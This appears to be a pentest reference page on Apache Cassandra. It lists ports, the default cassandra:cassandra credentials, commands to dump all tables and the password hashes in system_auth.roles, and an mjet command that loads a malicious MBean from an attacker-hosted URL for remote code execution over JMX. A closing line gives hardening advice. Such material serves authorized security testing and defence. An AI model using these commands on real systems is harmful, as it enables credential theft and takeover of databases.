Cassandra
aka cql
Distributed NoSQL database — CQL on 9042, JMX on 7199. Default cassandra:cassandra creds are common; the JMX port often allows unauthenticated MBean loading for RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
9042 | tcp | CQL native protocol |
7199 | tcp | JMX (management → RCE) |
9160 | tcp | legacy Thrift |
Fingerprint
- nmap cassandra-info returns cluster name + version
- cqlsh connects on 9042
Default / weak creds
cassandra / cassandra default superuser
Exploitation primitives
- Default cassandra:cassandra → cqlsh, read every keyspace/table (app creds live here)
- List users and password hashes from system_auth.roles
- Unauthenticated JMX on 7199 → load a malicious MBean for RCE (mjet / jmxploit)
Overview
Cassandra speaks CQL on 9042 and exposes JMX on 7199. The quick wins are default creds into the data, and an open JMX port for code execution.
Enumeration
Version / cluster info:
nmap -p9042 --script cassandra-info <TARGET>Connect with default creds:
cqlsh <TARGET> 9042 -u cassandra -p cassandraList keyspaces, then dump a table:
DESC KEYSPACES;
SELECT * FROM system_auth.roles;JMX → RCE (7199)
If JMX has no auth, load a malicious MBean:
java -jar mjet.jar <TARGET> 7199 install jmxrmi http://<YOUR_IP>:8000 8000Hardening
Change the default superuser, require authentication, and lock JMX behind auth + TLS.